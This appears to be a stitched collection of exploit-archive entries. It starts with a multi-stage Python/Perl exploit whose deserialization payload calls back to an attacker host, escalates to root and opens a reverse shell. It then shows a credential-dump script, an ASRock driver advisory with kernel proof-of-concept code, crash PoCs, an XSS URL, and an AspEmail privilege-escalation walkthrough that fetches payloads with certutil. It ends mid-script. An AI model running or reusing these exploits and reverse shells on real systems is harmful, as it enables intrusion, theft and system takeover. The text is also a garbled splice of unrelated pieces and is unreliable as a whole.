# Thanks to Agarri: http://www.agarri.fr/docs/PoC_thaw_perl58.pl
# This script creates serialized object that makes reverse connection and executes everything what it receives on a socket
file = """
#!/usr/bin/perl

use strict;
use MIME::Base64 qw( encode_base64 );
use Storable qw( nfreeze );
use LWP::UserAgent;

my $package_name = "A" x 252;
my $pack = qq~{ package $package_name; sub STORABLE_freeze { return 1; } }~;
eval($pack);

my $payload = qq~POSIX;eval('sleep(10);use IO::Socket::INET;\$r=IO::Socket::INET->new(\"""" + lhost + """:443");if (\$r) {eval(<\$r>);}');exit;~;

my $padding = length($package_name) - length($payload);
$payload = $payload . (";" x $padding);
my $data = bless { ignore => 'this' }, $package_name;
my $frozen = nfreeze($data);
$frozen =~ s/$package_name/$payload/g;
my $encodedSize = length($frozen);
my $pakiet = print(pack("N", $encodedSize), $frozen);
print "$frozen";
"""

# save file, run perl script and save our serialized payload
f = open("payload.pl", "w")
f.write(file)
f.close()

serialized = os.popen("perl ./payload.pl").read()
os.remove("./payload.pl")

# start thread that sends requests
thread = requests()
thread.start()

# open socket that receives connection from index
sock, conn, addr = create_socket(80)
print 'Received connection from: ' + addr[0] + ':' + str(addr[1]) + '.'
print 'Sending 1st stage payload.'
data = conn.recv(256)
# say hello to RPC client
conn.sendall(data)
data = conn.recv(256)
# send serialized object that initiates connect back connection and executes everything what it receives on a socket
conn.sendall(serialized)
sock.close()

# create second socket that receives connection from index and sends additional commands
sock, conn, addr = create_socket(443)
print 'Sending 2nd stage payload.'
# send commands that exploit confd (running with root permissions) which is running on localhost - the same exploitation as for first stage
conn.sendall('sleep(10);use IO::Socket::INET;my $s = new IO::Socket::INET(PeerHost => "127.0.0.1",PeerPort => "4472",Proto => "tcp");$s->send("\\x00\\x00\\x00\\x1d\\x05\\x06\\x02\\x00\\x00\\x00\\x04\\x0a\\x04\\x70\\x72\\x70\\x63\\x0a\\x04\\x30\\x2e\\x30\\x31\\x0a\\x06\\x73\\x79\\x73\\x74\\x65\\x6d\\x0a\\x00");my $a;$s->recv($a,1024);$s->send("' + "\\x" + "\\x".join("{:02x}".format(ord(c)) for c in serialized) + '");$s->recv($a,1024);$s->close();\n')
sock.close()

# create socket that receives connection from confd and sends commands to get reverse shell
sock, conn, addr = create_socket(443)
print 'Sending 3rd stage payload.'
# send reverse shell payload
conn.sendall('sleep(20);use Socket;$i="' + lhost + '";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\n')
sock.close()

# create socket to receive shell with root permissions
print '\nNow you need to wait for shell.'
sock, conn, addr = create_socket(443)
receive(conn)
while True:
    cmd = raw_input("")
    if cmd == 'exit':
        break
    else:
        conn.send(cmd + "\n")
        receive(conn)
sock.close()

            
source: https://www.securityfocus.com/bid/67271/info

AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities.

Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.

Team Helpdesk 8.3.5 is vulnerable; other versions may also be affected. 

#!/usr/bin/python

import sys
import re
import os
import subprocess

print "This is a User Credential Dump for Team Helpdesk Customer Web Service 8.3.5 (and prior) by bhamb.\n"
print "Send any comment to ccb3b72@gmail.com\n"

if len(sys.argv) != 2:
	print('Usage: user_cred_dump.py https://Hostname.com')
	exit(1)

hostname=sys.argv[1]+"/cws/bin/cwacallers.xml"
print hostname
subprocess.Popen(['wget', '--no-check-certificate',hostname]).communicate()

print "The following usernames and encrypted password were found.\n"
cmd="cat cwacallers.xml | grep '@' | cut -d'\"' -f4,6 | sed 's/\"/:/g' "
test=os.system(cmd)
            
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

ASRock Drivers Elevation of Privilege Vulnerabilities

1. *Advisory Information*

Title: ASRock Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0005
Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
Date published: 2018-10-25
Date of last update: 2018-10-25
Vendors contacted: ASRock
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712

3. *Vulnerability Description*

ASRock's website states that [1]:

ASRock Inc. is established in 2002, specialized in the field of
motherboards. With the 3C design concept, Creativity, Consideration,
Cost-effectiveness, the company explores the limit of motherboards
manufacturing while paying attention on the eco issue at the same
time, developing products with the consideration of eco-friendly
concept. ASRock has been growing fast and become world third largest
motherboard brand with headquarter in Taipei, Taiwan and branches in
Europe and the USA.

ASRock offers several utilities designed to give the user with an ASRock
motherboard more control over certain settings and functions.
These utilities include various features like the RGB LED control,
hardware monitor, fan controls, and overclocking/voltage options.

Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys
low level drivers, installed by ASRock RGBLED and other ASRock branded
utilities, which could allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

   . ASRock RGBLED before v1.0.35.1
   . A-Tuning before v3.0.210
   . F-Stream before v3.0.210
   . RestartToUEFI before v1.0.6.2

5. *Vendor Information, Solutions and Workarounds*

ASRock published the following fixed applications for each of its
motherboard models:

   . ASRock RGBLED v1.0.36
   . A-Tuning v3.0.216
   . F-Stream v3.0.216
   . RestartToUEFI v1.0.7

Downloads are available on the ASRock website.

6. *Credits*

These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo
from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

ASRock's RGBLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
use a low level driver to program and query the status on embedded ICs
on their hardware. Fan curves, clock frequencies, LED colors, thermal
performance, and other user customizable properties and monitoring
functionality are exposed to applications through this low level kernel
driver.

The main subjects of this advisory are the device drivers
installed/loaded by these utilities (AsrDrv101.sys and AsrDrv102.sys),
referred to from now on as "AsrDrv". The default installation allows
non-privileged user processes (even those running at LOW INTEGRITY) to
obtain a HANDLE to the driver and issue IOCTL codes to it.

The following sections describe the problems found.

7.1. *CR register access*

[CVE-2018-10709]

AsrDrv exposes functionality to read and write CR register values. This
could be leveraged in a number of ways to ultimately run code with
elevated privileges.

/-----
// Asrock RGBLED PoC demonstrating non-privileged access to CR registers

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define IOCTL_ASROCK_READCR 0x22286C
#define IOCTL_ASROCK_WRITECR 0x222870

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _ASROCK_CR_STRUCT {
    ULONG64 reg;
    ULONG64 value;
} ASROCK_CR_STRUCT;

#pragma pack(pop)

// Sends one IOCTL; expects a local ASROCK_CR_STRUCT named 'inbuffer'.
#define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 };    \
    DWORD returned = 0;    \
    DeviceIoControl(ghDriver, (iocontrolcode), (LPVOID)&inbuffer, (size), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);    \
    return outbuffer[1];

ULONG64 ASROCK_ReadCR(DWORD reg)
{
    ASROCK_CR_STRUCT  inbuffer = { reg, 0};
    IOCTLMACRO(IOCTL_ASROCK_READCR, 10)
}

ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value)
{
    ASROCK_CR_STRUCT  inbuffer = { reg, value};
    IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10)
}

BOOL InitDriver()
{
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char* argv[])
{
    printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n");

    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }

    ULONG64 a = ASROCK_ReadCR(3);
    printf("CR3 (PageDir): %llx\n", a);
    printf("press ENTER for instant system CRASH\n");
    getchar();

    a = ASROCK_WriteCR(3, 0xffff1111ffff2222);

    CloseHandle(ghDriver);
}
-----/

7.2. *Arbitrary physical memory read/write*

[CVE-2018-10710]

AsrDrv's IOCTL code 0x22280C exposes functionality to read and write
arbitrary physical memory. This could be leveraged by a local attacker
to elevate privileges.

Proof of Concept:

/-----
// Asrock RGBLED PoC (arbitrary physical memory write)
// This PoC demonstrates arbitrary write to physical memory.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define IOCTL_ASROCK_WRITEPH 0x22280C

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _ASROCK_PH_STRUCT {
    ULONG64 destPhysical;
    DWORD size;
    DWORD unk0;
    ULONG64 src;
} ASROCK_PH_STRUCT;

#pragma pack(pop)

BOOL ASROCK_ph_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
    ASROCK_PH_STRUCT mystructIn = { dest, size, 0, src};

    BYTE outbuffer[0x30] = { 0 };

    DWORD returned = 0;
    DeviceIoControl(ghDriver, IOCTL_ASROCK_WRITEPH, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
    if (returned) {
        return TRUE;
    }
    return FALSE;
}

BOOL InitDriver()
{
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char * argv[])
{
    printf("Asrock RGBLED PoC (arbitrary physical memory write) - pnx!/CORE\n");
    if (!InitDriver()) {
        exit(0);
    }

    printf("press ENTER for SYSTEM CRASH\n");
    getchar();
    ULONG64 data = 0xFFFF1111FFFF2222;
    for (unsigned int i = 0; i < 0xffffffff; i += 0x1000) {
        printf(".");
        ASROCK_ph_memcpy(i, (ULONG64)&data, 8);
    }

    CloseHandle(ghDriver);
    return 0;
}
-----/

7.3. *MSR Register access*

[CVE-2018-10711]

AsrDrv exposes functionality to read and write Model-Specific
Registers (MSRs). This could be leveraged to execute arbitrary ring-0
code.

Proof of Concept:

/-----
// Asrock RGBLED PoC demonstrating non-privileged access to MSR registers

// This PoC demonstrates non privileged MSR access by reading
// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR)
// and then writing garbage to it (instant BSOD!)

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define IOCTL_ASROCK_RDMSR 0x222848
#define IOCTL_ASROCK_WRMSR 0x22284C

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _ASROCK_MSRIO_STRUCT {
    ULONG64 valLO;        // low 32 bits of the MSR value
    DWORD reg;            // MSR index
    ULONG64 valHI;        // high 32 bits of the MSR value
} ASROCK_MSRIO_STRUCT;

#pragma pack(pop)

// Sends one IOCTL; expects a local ASROCK_MSRIO_STRUCT named 'inbuffer'.
#define IOCTLMACRO(iocontrolcode, size) \
    ASROCK_MSRIO_STRUCT outbuffer = { 0 };\
    DWORD returned = 0;    \
    DeviceIoControl(ghDriver, (iocontrolcode), (LPVOID)&inbuffer, (size), (LPVOID)&outbuffer, sizeof(outbuffer), &returned, NULL);    \
    return (outbuffer.valHI << 0x20 | outbuffer.valLO);

ULONG64 GIO_RDMSR(DWORD reg)
{
    ASROCK_MSRIO_STRUCT inbuffer = { 0, reg };
    IOCTLMACRO(IOCTL_ASROCK_RDMSR, 20)
}

ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
{
    ASROCK_MSRIO_STRUCT inbuffer = { value & 0xffffffff, reg, (value & 0xffffffff00000000)>>0x20 };
    IOCTLMACRO(IOCTL_ASROCK_WRMSR, 20)
}

BOOL InitDriver()
{
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char * argv[])
{
    printf("Asrock RGBLED PoC (MSR access) - pnx!/CORE\n");

    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }

    ULONG64 a = GIO_RDMSR(0xC0000082);
    printf("IA32_LSTAR: %llx (nt!KiSystemCall64)\n", a);
    printf("press ENTER for instant BSOD\n");
    getchar();

    a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
    return (int)CloseHandle(ghDriver);
}
-----/

7.4. *Port mapped I/O access*

[CVE-2018-10712]

AsrDrv exposes functionality to read/write data from/to IO ports. This
could be leveraged in a number of ways to ultimately run code with
elevated privileges.

/-----
// Asrock RGBLED PoC demonstrating non-privileged access to IO ports

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define IOCTL_ASROCK_PORTREADB 0x222810
#define IOCTL_ASROCK_PORTWRITEB 0x222814

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _ASROCK_CR_STRUCT {
    DWORD port;
    ULONG64 value;
} ASROCK_CR_STRUCT;

#pragma pack(pop)

// Sends one IOCTL; expects a local ASROCK_CR_STRUCT named 'inbuffer'.
#define IOCTLMACRO(iocontrolcode, size) \
    BYTE outbuffer[0x10] = { 0 };    \
    DWORD returned = 0;    \
    DeviceIoControl(ghDriver, (iocontrolcode), (LPVOID)&inbuffer, (size), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);    \
    return outbuffer[1];

BYTE ASROCK_ReadPortB(DWORD port)
{
    ASROCK_CR_STRUCT  inbuffer = { port, 0};
    IOCTLMACRO(IOCTL_ASROCK_PORTREADB, 10)
}

BYTE ASROCK_WritePortB(DWORD port, ULONG64 value)
{
    ASROCK_CR_STRUCT  inbuffer = { port, value};
    IOCTLMACRO(IOCTL_ASROCK_PORTWRITEB, 10)
}

void Reboot()
{
    BYTE cf9 = ASROCK_ReadPortB(0xcf9) & ~0x6;
    ASROCK_WritePortB(0xcf9, cf9 | 2);
    Sleep(50);
    ASROCK_WritePortB(0xcf9, cf9 | 0xe);
    Sleep(50);
}

BOOL InitDriver()
{
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char * argv[])
{
    printf("Asrock RGBLED PoC (PMIO access) - pnx!/CORE\n");

    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }

    Reboot();
    return (int)CloseHandle(ghDriver);
}
-----/
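As an added example (not part of the SecureAuth advisory or of any ASRock code), the following Python decodes the IOCTL codes quoted in sections 7.1 to 7.4 back into the fields of the documented CTL_CODE macro. It shows why the handle's access mask could not have protected these requests: every code carries FILE_ANY_ACCESS, so the device object's DACL (or a check in the driver's dispatch routine) was the only possible gate.

```python
"""Decode the IOCTL codes from the AsrDrv proofs of concept (sections 7.1-7.4).

Added example, not part of the SecureAuth advisory or of ASRock's code.
A Windows I/O control code is a 32-bit value assembled by the CTL_CODE macro:

    CTL_CODE(DeviceType, Function, Method, Access) =
        (DeviceType << 16) | (Access << 14) | (Function << 2) | Method

The Access field is what the I/O manager checks against the handle before the
driver ever sees the request. FILE_ANY_ACCESS (0) disables that check, so for
such codes the only remaining gate is the DACL on the device object itself.
"""

FILE_DEVICE_UNKNOWN = 0x22
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}

# Names and values exactly as they appear in the advisory's PoC sources.
ADVISORY_IOCTLS = {
    "IOCTL_ASROCK_READCR": 0x22286C,
    "IOCTL_ASROCK_WRITECR": 0x222870,
    "IOCTL_ASROCK_WRITEPH": 0x22280C,
    "IOCTL_ASROCK_RDMSR": 0x222848,
    "IOCTL_ASROCK_WRMSR": 0x22284C,
    "IOCTL_ASROCK_PORTREADB": 0x222810,
    "IOCTL_ASROCK_PORTWRITEB": 0x222814,
}


def decode_ioctl(code):
    """Split a 32-bit control code into its four CTL_CODE fields."""
    if not 0 <= code <= 0xFFFFFFFF:
        raise ValueError("control code must fit in 32 bits")
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


def ctl_code(device_type, function, method, access):
    """Mirror of the CTL_CODE macro; inverse of decode_ioctl."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def describe(name, code):
    """One human-readable line per control code."""
    f = decode_ioctl(code)
    # Function numbers 0x800 and above are reserved for third-party drivers.
    origin = "vendor-defined" if f["function"] >= 0x800 else "Microsoft-reserved"
    if f["device_type"] == FILE_DEVICE_UNKNOWN:
        devtype = "FILE_DEVICE_UNKNOWN"
    else:
        devtype = "0x%X" % f["device_type"]
    return "%s = 0x%06X: %s, function 0x%03X (%s), %s, %s" % (
        name, code, devtype, f["function"], origin,
        METHODS[f["method"]], ACCESS[f["access"]])


def unguarded_ioctls(table):
    """Names of control codes whose Access field is FILE_ANY_ACCESS.

    For these the I/O manager forwards the request on any handle to the device,
    whatever access the handle was opened with; only the device object's DACL
    (or an explicit check in the driver's dispatch routine) can refuse it.
    """
    return sorted(n for n, c in table.items() if decode_ioctl(c)["access"] == 0)


if __name__ == "__main__":
    for ioctl_name, ioctl_code in ADVISORY_IOCTLS.items():
        print(describe(ioctl_name, ioctl_code))
    print("FILE_ANY_ACCESS codes:", ", ".join(unguarded_ioctls(ADVISORY_IOCTLS)))
```

The usual mitigations for this class of bug are a restrictive DACL on the device object (for example via IoCreateDeviceSecure with an SDDL string limiting access to administrators) and an explicit requestor check in the dispatch routine; the advisory does not say which of these ASRock applied.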

8. *Report Timeline*

2018-03-12: SecureAuth sent an initial notification to ASRock America
Support.
2018-03-13: ASRock confirmed receipt and requested additional
information in order to send it to its HQ.
2018-03-13: SecureAuth answered that a draft advisory including a
technical description had been written, and requested PGP keys in order
to send it encrypted.
2018-03-14: ASRock asked for the advisory in clear text.
2018-03-14: SecureAuth sent the draft advisory to ASRock in clear text
form.
2018-03-14: ASRock confirmed receipt and said it would submit the
advisory to its HQ for validation.
2018-03-23: SecureAuth requested a status update on the case.
2018-03-23: ASRock answered that it had not yet received a reply from HQ.
2018-03-26: ASRock notified SecureAuth that it was still checking the
reported vulnerabilities and requested additional time.
2018-03-27: SecureAuth thanked ASRock for the status update and said it
would be in contact the following week.
2018-03-28: ASRock informed SecureAuth that it had checked the reported
vulnerabilities and would have a preliminary schedule for the fix at
the end of April.
2018-03-28: SecureAuth thanked ASRock for its reply.
2018-04-20: ASRock notified SecureAuth that the driver had been
modified, sent the fixed applications, and requested feedback.
2018-04-23: SecureAuth acknowledged receipt of the fixed applications.
2018-05-09: SecureAuth tested the modified driver and verified that the
issues detailed in the proofs of concept were solved. SecureAuth
therefore proposed May 23rd as the release date.
2018-05-09: ASRock thanked SecureAuth for its update and forwarded the
proposal to its HQ for confirmation.
2018-05-15: ASRock notified SecureAuth that it was going to deploy the
new driver architecture into each ASRock utility, and estimated that
the whole project would be finished by the end of June.
2018-05-15: SecureAuth thanked ASRock for its update and asked whether
ASRock planned to release a security note.
2018-05-23: ASRock informed SecureAuth that each utility would include a
release note with a security description.
2018-06-15: SecureAuth requested a status update from ASRock on its
timescale.
2018-06-09: ASRock forwarded the request to its HQ.
2018-06-19: ASRock informed SecureAuth that it had started to upload the
fixed drivers for one of the supported motherboard series and would
continue uploading the drivers for other models.
2018-07-11: SecureAuth requested a status update from ASRock.
2018-07-11: ASRock replied that it was still working on the upload
process.
2018-08-06: SecureAuth requested a new status update from ASRock.
2018-08-16: ASRock notified SecureAuth that it had finished the update
process.
2018-10-17: SecureAuth set October 25th as the publication date.
2018-10-25: Advisory CORE-2018-0005 published.

9. *References*

[1] http://www.asrock.com/

10. *About SecureAuth Labs*

SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.

11. *About SecureAuth*

SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and exponentially reduce the enterprise threat surface. To learn more,
visit http://www.secureauth.com, call (949) 777-6959, or email us at
info@secureauth.com

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
            
#Exploit Title:  ASPRunner.NET 10.1 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-09
#Vendor Homepage: https://xlinesoft.com/
#Software Link: https://xlinesoft.com/asprunnernet/download.htm
#Tested Version: 10.1
#Tested on: Windows 7 Service Pack 1 x64 

#Steps to produce the crash:
#1.- Run python code: ASPRunner_net_10_1.py
#2.- Open ASPRunner_10_1.txt and copy content to clipboard
#3.- Open ASPRunner.NET
#4.- Click on "Next" > Select "SQLite" database > click on "Next"
#5.- Click on "Create new database" 
#6.- In "Table name" field paste the clipboard content
#7.- Click on "Create table"
#8.- Crashed

cod = "\x41" * 10000
f = open('ASPRunner_10_1.txt', 'w')
f.write(cod)
f.close()
            
# Exploit Title: ASPRunner Professional v6.0.766 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://www.xlinesoft.com/asprunnerpro
# Software Link : http://www.xlinesoft.com/asprunnerpro
# Tested Version: v6.0.766
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run AspRunnerPro.exe
# 2.- Copy the content of AspRunnerPro_Crash.txt (180 "A", the result of this python script) to the clipboard
# 3.- Go to the wizard "Create a new project" and paste the result (180 "A" or more) into the "Project name:" field
# 4.- Click on the Next button and you will see a crash.

#!/usr/bin/env python

crash = "\x41" * 180
f = open ("AspRunnerPro_Crash.txt", "w")
f.write(crash)
f.close()
            
source: https://www.securityfocus.com/bid/49674/info

Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected. 

http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS] 
            
####################################################################################################################
# Exploit Title:  AspEmail 5.6.0.2 - Local Privilege Escalation                                                    #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability]                             #
# Date: 13/04/2023                                                                                                 #
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]                                                               #
# Vendor Homepage: https://www.aspemail.com                                                                        #
# Software Link: https://www.aspemail.com/download.html                                                            #
# Product: AspEmail                                                                                                #
# Version: AspEmail 5.6.0.2 and all                                                                                #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU                                                    #
# Tested on: Windows Server 2016 and Windows Server 2019                                                           #
# CVE : 0DAY                                                                                                       #
####################################################################################################################

# ==================================================================================================================

[+] C:\PenTest>whoami /priv

 PRIVILEGES INFORMATION
 ----------------------

 Privilege Name                Description                               State   
 ============================= ========================================= ========
 SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
 SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
 SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
 SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
 
# ==================================================================================================================

* First, we will test whether the AspEmail service is active.
* To do so, we run a query with normal user rights to list the processes running on the system and check whether the process of the relevant service is running:

[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
   EmailAgent.exe                4400 Persits Software EmailAgent

                           or                                                 

[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
   EmailAgent64.exe                4400 Persits Software EmailAgent
   
* We have detected that the process of the "Persits Software Email Agent" Service is in the "RUNNING" state.
* Now we know that the AspEmail service is active.

# ==================================================================================================================

* We will need these:

[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"

# ==================================================================================================================
                                                                                          
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

 Name: Persits Software EmailAgent
 ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
 Agent.exe" /run
 User              : LocalSystem
 ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
 IdentityReference : Everyone
 Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, 
 AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, 
 ReadExtendedAttributes, DeleteChild, Execute/Traverse
 Status            : Unknown
 UserCanStart      : False
 UserCanStop       : False
 
[+] C:\PenTest>del PrivescCheck.ps1

* We detected a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" Service in our checks.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"

    Successfully processed 0 files; Failed processing 1 files
    C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.

* We do not have permission to access subdirectories.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

 C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                            DeepSecLab\psacln:(I)(OI)(CI)(N)
                            DeepSecLab\psaadm:(I)(OI)(CI)(N)
                            DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
                            BUILTIN\Administrators:(I)(F)
                            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                            APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
                            NT SERVICE\TrustedInstaller:(I)(CI)(F)
                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                            BUILTIN\Users:(I)(OI)(CI)(RX)
                            APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
							
* Unlike the other directories, we have full privileges on the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in Linux terms.
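The listing above is the kind of thing a defender can check for automatically. Added example, not part of the original write-up: the Python below parses icacls output and flags ACEs that give write-class rights to principals every local user belongs to. The sample input is the BIN listing quoted above, constructed here with a few entries dropped; the principal list and the rights classification are my own assumptions.

```python
"""Flag icacls entries that let every local user modify a service's directory.

Added example, not part of the original write-up. The sample is the icacls
listing of the AspEmail BIN directory quoted above (constructed here with a few
entries dropped); the principal list and the rights classification are my own
assumptions.
"""
import re

# One icacls ACE: PRINCIPAL:(flag)(flag)...(RIGHTS), e.g. Everyone:(OI)(CI)(F).
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<perms>(?:\([^)]*\))+)$")

# Principals that any local account belongs to. A write-class ACE for one of
# them makes the path modifiable by every user on the machine.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls simple rights (F, M, W, D) and specific rights that allow creating,
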